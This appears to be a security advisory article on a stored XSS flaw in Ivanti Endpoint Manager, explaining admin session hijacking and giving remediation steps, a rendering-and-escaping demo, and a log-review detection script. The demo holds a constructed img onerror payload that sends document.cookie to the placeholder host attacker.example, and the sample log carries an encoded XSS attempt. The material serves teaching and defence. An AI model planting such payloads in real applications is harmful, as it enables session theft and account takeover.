
Critical Ivanti EPM Vulnerability Allows Admin Session Hijacking via Stored XSS
In the intricate landscape of enterprise IT management, a single vulnerability can unravel the most robust security postures. For organizations relying on Ivanti Endpoint Manager (EPM), a critical flaw has emerged, exposing administrator sessions to potential hijacking. This isn’t merely a theoretical risk; it represents a tangible threat that could grant attackers complete control over your EPM environment without needing initial authentication.
The Critical Flaw: Unauthenticated Administrator Session Hijacking
A severe stored Cross-Site Scripting (XSS) vulnerability, tracked as CVE-2025-10573, has been discovered in Ivanti EPM versions 2024 SU4 and earlier. The flaw carries a CVSS base score of 9.6 (Critical), underscoring its potential impact.
At its core, a stored (persistent) XSS vulnerability lets an attacker write attacker-controlled markup or script into data the application keeps, such as a database field, which the application later emits into a page without proper output encoding. When a legitimate user, particularly an administrator, views the page containing that stored content, the browser treats it as part of the application and executes the script with that user's authority. In the context of this Ivanti EPM vulnerability, that execution can lead to session hijacking: if the session cookie is readable by script (that is, it lacks the HttpOnly flag), the payload can send it to the attacker, who then presents it to impersonate the administrator. Even where the cookie is protected, script running in the administrator's page can issue requests inside the already-authenticated session, so the practical effect is control of that session without the attacker ever needing the administrator's credentials.
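To make the mechanism concrete, here is an added Python example (not Ivanti's code, and not the actual CVE-2025-10573 payload, which the page does not disclose): a hypothetical page template that emits a stored "device note", rendered once without output encoding and once through html.escape, plus a small check built on the standard-library HTML parser that reports which rendering hands the browser an inline event handler. The payload, the template and the attacker.example domain are all constructed for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed illustration of what an attacker might store in a free-text
# field (for example a device note). This is NOT the payload used against
# CVE-2025-10573; the page does not disclose it. "attacker.example" is a
# placeholder domain.
STORED_PAYLOAD = (
    "<img src=x onerror=\"fetch('https://attacker.example/c?'"
    "+encodeURIComponent(document.cookie))\">"
)

# Hypothetical page template: the stored note is emitted inside a text node.
PAGE_TEMPLATE = (
    "<html><body><h1>Device notes</h1>"
    "<div class='note'>{note}</div></body></html>"
)


def render_vulnerable(note: str) -> str:
    """Emit the stored value verbatim. A browser parses the attacker's <img>
    tag and runs its onerror handler in the viewing admin's session."""
    return PAGE_TEMPLATE.format(note=note)


def render_hardened(note: str) -> str:
    """Contextual output encoding for an HTML text node: <, >, &, " and '
    become entities, so the stored string is displayed, never parsed."""
    return PAGE_TEMPLATE.format(note=html.escape(note, quote=True))


class EventHandlerFinder(HTMLParser):
    """Record every start tag carrying an inline on* handler: roughly what a
    browser would execute. html.parser is stdlib, so this runs offline."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[tuple[str, str, str]] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower().startswith("on"):
                self.findings.append((tag, name, value or ""))


def event_handlers(rendered: str) -> list[tuple[str, str, str]]:
    """Return (tag, attribute, script) triples found in a rendered page."""
    parser = EventHandlerFinder()
    parser.feed(rendered)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable),
                          ("hardened", render_hardened)):
        print(f"{label}: {event_handlers(render(STORED_PAYLOAD))}")
```

Run it and the vulnerable rendering reports one onerror handler on an img tag while the hardened rendering reports none. The constructed payload reads document.cookie; marking the session cookie HttpOnly defeats that particular exfiltration but not a payload that simply issues authenticated requests from inside the administrator's page, which is why output encoding in the application, not a cookie flag, is the actual fix.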
Understanding the Threat: Why Stored XSS is So Dangerous
Unlike reflected XSS, which requires a user to click a specially crafted link, stored XSS persists. Once the malicious script is embedded, it remains within the application’s database and will execute every time the compromised content is accessed. This makes it particularly dangerous for several reasons:
- Persistence: The payload remains active until it’s removed, potentially affecting multiple users over time.
- Wider Impact: Any user who accesses the compromised section of the application can be affected, not just those who fall for a phishing attempt.
- Administrative Compromise: When an administrator’s session is hijacked, it grants the attacker elevated privileges, allowing them to make widespread changes, deploy malware, exfiltrate data, or disrupt operations.
- Bypass Authentication: A successful session hijack often negates the need for the attacker to possess login credentials, as they are effectively “stepping into” an already authenticated session.
Remediation Actions: Immediate Steps to Secure Your Ivanti EPM
The good news is that Ivanti has already released a patch for CVE-2025-10573. The key to mitigating this risk is prompt action:
- Update to Ivanti EPM 2024 SU4 SR1: The patch was released on December 9, 2025, with the introduction of version 2024 SU4 SR1. Organizations using Ivanti EPM versions 2024 SU4 and below must prioritize upgrading to this patched version immediately.
- Regular Patch Management: This incident underscores the importance of a robust patch management strategy. Ensure all software, especially mission-critical management tools like EPM, is kept up to date with the latest security fixes.
- Implement Web Application Firewalls (WAFs): While not a replacement for patching, a well-configured WAF can add a layer of defense by filtering or blocking requests that carry script-like input. Be aware of its limits: it inspects inbound traffic only, so it cannot remove a payload that is already stored in the application, and encoded or obfuscated payloads can evade signature-based rules.
- Security Awareness Training: Educate IT staff and administrators about the dangers of XSS and best practices for secure browsing, even within internal applications.
- Monitor for Suspicious Activity: Regularly review EPM and web server logs and network traffic. Indicators worth looking for include an administrator session cookie used from a new source IP or user agent, requests whose parameters contain HTML tags or inline event handlers, and administrative actions (new accounts, new deployment tasks) that no administrator recognizes.
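As an added example of the log review recommended above (constructed sample data, not Ivanti's code and not EPM's real log format), the following Python reads a hypothetical access log and flags two things: a session id presented from more than one client IP and user agent, which is how a replayed stolen cookie looks, and requests whose URL-decoded parameters carry HTML tags or inline event handlers, which is what an attempt to plant a stored payload looks like. The log layout, IP addresses, paths and session ids are all made up.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed access-log sample in a hypothetical format:
#   <timestamp> <client_ip> <method> <path> <status> sid=<session id> "<user agent>"
# This is NOT Ivanti EPM's real log format. 10.0.0.5 is the admin's workstation,
# 203.0.113.9 plants a payload without a session, and 198.51.100.23 later
# replays the admin's session id from a non-browser client.
SAMPLE_LOG = """\
2025-12-10T08:00:01Z 10.0.0.5 GET /console/devices 200 sid=3f9c2a "Mozilla/5.0 (Windows NT 10.0) Chrome/131"
2025-12-10T08:00:07Z 203.0.113.9 POST /console/devices/note?text=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E 302 sid=- "Mozilla/5.0 (X11; Linux) Firefox/133"
2025-12-10T08:02:13Z 10.0.0.5 GET /console/devices 200 sid=3f9c2a "Mozilla/5.0 (Windows NT 10.0) Chrome/131"
2025-12-10T08:02:14Z 198.51.100.23 GET /console/users 200 sid=3f9c2a "curl/8.5.0"
2025-12-10T08:02:20Z 198.51.100.23 POST /console/users/create 200 sid=3f9c2a "curl/8.5.0"
2025-12-10T08:05:42Z 10.0.0.6 GET /console/reports 200 sid=b41d0e "Mozilla/5.0 (Macintosh) Safari/18"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3}) '
    r'sid=(?P<sid>\S+) "(?P<ua>[^"]*)"$'
)

# Markup that should never appear in a legitimate request parameter:
# a tag opener, an inline event handler, or a javascript: URL.
MARKUP_RE = re.compile(r"<\s*[a-z]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)


def parse_log(text: str):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def find_session_anomalies(text: str) -> dict[str, list[tuple[str, str]]]:
    """Sessions whose id was presented by more than one (ip, user agent) pair.
    A stolen cookie replayed from the attacker's host shows up exactly this way."""
    clients: dict[str, set[tuple[str, str]]] = defaultdict(set)
    for rec in parse_log(text):
        if rec["sid"] != "-":  # "-" marks an unauthenticated request
            clients[rec["sid"]].add((rec["ip"], rec["ua"]))
    return {sid: sorted(c) for sid, c in clients.items() if len(c) > 1}


def find_injection_attempts(text: str) -> list[tuple[str, str, str]]:
    """Requests whose URL-decoded path or query carries HTML/script markup:
    candidate attempts to plant a stored payload."""
    hits = []
    for rec in parse_log(text):
        decoded = unquote(rec["path"])
        if MARKUP_RE.search(decoded):
            hits.append((rec["ts"], rec["ip"], decoded))
    return hits


if __name__ == "__main__":
    for sid, who in find_session_anomalies(SAMPLE_LOG).items():
        print(f"session {sid} used by multiple clients: {who}")
    for ts, ip, path in find_injection_attempts(SAMPLE_LOG):
        print(f"{ts} {ip} markup in request: {path}")
```

On the sample, session 3f9c2a is flagged because it appears from the administrator's browser and then from a curl client on another host, and the single injection attempt from 203.0.113.9 is reported with its decoded payload. In production the same two checks would be pointed at whatever log source records the EPM console's requests, with the regexes adjusted to that format.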
Tools for Detection and Mitigation
Leveraging the right tools can significantly enhance your ability to detect and prevent vulnerabilities like stored XSS.
| Tool Name | Purpose | Link |
|---|---|---|
| Ivanti EPM Update Manager | Official tool for managing EPM updates and patches. | [Accessible via your Ivanti EPM console] |
| Web Application Firewalls (WAFs) | Provides a protective shield for web applications, filtering malicious requests. | Cloudflare WAF (Example) |
| Burp Suite Professional | Comprehensive toolkit for web vulnerability scanning and manual testing. | https://portswigger.net/burp |
| OWASP ZAP | Free and open-source web application security scanner. | https://www.zaproxy.org/ |
Conclusion
The discovery of CVE-2025-10573 in Ivanti EPM highlights the persistent challenges in securing complex enterprise management platforms. An unauthenticated administrator session hijacking vulnerability with a CVSS score of 9.6 demands immediate attention. By upgrading to Ivanti EPM version 2024 SU4 SR1, implementing robust patch management, and enhancing your overall security posture, organizations can effectively neutralize this significant threat and protect their critical IT infrastructure.


